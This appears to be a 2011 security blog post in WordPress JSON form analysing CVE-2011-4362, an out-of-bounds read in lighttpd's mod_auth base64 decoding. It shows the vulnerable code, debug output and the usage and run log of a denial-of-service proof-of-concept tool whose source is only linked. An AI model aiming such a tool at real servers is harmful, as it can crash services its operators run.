{"id":277,"date":"2011-12-25T00:42:38","date_gmt":"2011-12-24T23:42:38","guid":{"rendered":"http:\/\/blog.pi3.com.pl\/?p=277"},"modified":"2011-12-25T11:49:47","modified_gmt":"2011-12-25T10:49:47","slug":"lighttpd-proof-of-concept-code-for-cve-2011-4362","status":"publish","type":"post","link":"https:\/\/blog.pi3.com.pl\/?p=277","title":{"rendered":"Lighttpd Proof of Concept code for CVE-2011-4362"},"content":{"rendered":"<p>29 November 2011 was the date of public disclosure of an interesting vulnerability in the lighttpd server. Xi Wang discovered that mod_auth for this server does not properly decode characters from the extended ASCII table. The vulnerable code is below:<\/p>\n<pre>\"src\/http_auth.c:67\"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n\u00a0\u00a0 \u00a0...\r\n\u00a0\u00a0 \u00a0int ch, ...;\r\n\u00a0\u00a0 \u00a0size_t i;\r\n\u00a0\u00a0 \u00a0...\r\n\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0ch = in[i];\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0...\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0ch = base64_reverse_table[ch];\r\n\u00a0\u00a0 \u00a0...\r\n}\r\n--- CUT ---<\/pre>\n<p>Because the variable &#8216;in&#8217; is of type &#8216;char&#8217; (signed on this platform), characters 0x80 and above lead to negative indices. This vulnerability may lead to an out-of-bounds read and theoretically cause a Segmentation Fault (Denial of Service attack). Unfortunately I couldn&#8217;t find any binaries where the .rodata section before the base64_reverse_table table causes this situation.<\/p>\n<p>I have added some extra debug output to the lighttpd source code to see if this vulnerability is triggered correctly. Here is the output for one of the examples:<\/p>\n<pre>--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. 
| 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116(\u00a0 | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. | 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100(\u00a0 | 29 | 21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. | 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75(\u00a0 | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59(\u00a0 | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55(\u00a0 | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. 
| 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36(\u00a0 | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. | 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. | 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. | 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---<\/pre>\n<p>The first column is the offset, so the vulnerability is triggered as it should be (negative offsets). The second column is the byte which is read out of bounds.<\/p>\n<p>How to run this very primitive Proof of Concept?<\/p>\n<pre>$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ .\/p_cve-2011-4362 \r\n\r\n\u00a0\u00a0 \u00a0...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\r\n\r\n\u00a0\u00a0 \u00a0Usage: .\/p_cve-2011-4362 &lt;options&gt;\r\n\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0Options:\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0 -v &lt;victim&gt;\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0 -p &lt;port&gt;\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0 -d &lt;remote_dir_for_auth&gt;\r\n\r\n$ .\/p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n\r\n\u00a0\u00a0 \u00a0...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\r\n\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0[+] Preparing arguments... OK\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0[+] Creating socket... OK\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0[+] Connecting to [127.0.0.1]... OK\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0[+] Sending dirty packet... 
OK\r\n\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0[+] Check the website!\r\n\r\n$<\/pre>\n<p>Lighttpd will probably log this situation in the error-log file like this:<\/p>\n<pre>--- CUT ---\r\n...\r\n...\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in \u00c7Yg\\\u00a7\u00ce\u00fan\u00f6Xt\u00be]rze\u00eb\u00db\u00f4\u00begY\u00f3\u00ef\\\u00f0\u00ffYb\u00eeY(\u00bfd\u00df\u00f8r\u00d6[Y\u00f3\u00fa\u00d9-\u00b7xi\u00fe\u00e8i\u00b0k\u00c2Wp\u00cb\u00a0\u00a0 \u00a0]\u07f6\u00f8\u00f2\\\u00e4\u00c2\u00d7@V\u00d8\u00e4\u00a6x\u00f3\u00fa\u00ddize\r\n--- CUT ---<\/pre>\n<p>Maybe you can find a vulnerable binary?<\/p>\n<p>Best regards,<br \/>\nAdam &#8216;pi3&#8217; Zabrocki<\/p>\n<p>&#8212;<br \/>\n<a href=\"http:\/\/pi3.com.pl\" target=\"_blank\">http:\/\/pi3.com.pl<\/a><br \/>\n<a href=\"http:\/\/site.pi3.com.pl\/exp\/p_cve-2011-4362.c\" target=\"_blank\">http:\/\/site.pi3.com.pl\/exp\/p_cve-2011-4362.c<\/a><br \/>\n<a href=\"http:\/\/blog.pi3.com.pl\/?p=277\" target=\"_blank\">http:\/\/blog.pi3.com.pl\/?p=277<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>29 November 2011 was the date of public disclosure of an interesting vulnerability in the lighttpd server. Xi Wang discovered that mod_auth for this server does not properly decode characters from the extended ASCII table. 
The vulnerable code is below: &#8220;src\/http_auth.c:67&#8221; &#8212; CUT &#8212; static const short base64_reverse_table[256] = &#8230;; static unsigned char * base64_decode(buffer *out, const [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[4,5,6],"tags":[],"class_list":["post-277","post","type-post","status-publish","format-standard","hentry","category-bughunt","category-exploiting","category-ideas"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/posts\/277","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=277"}],"version-history":[{"count":14,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/posts\/277\/revisions"}],"predecessor-version":[{"id":290,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/posts\/277\/revisions\/290"}],"wp:attachment":[{"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=277"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=277"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=277"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}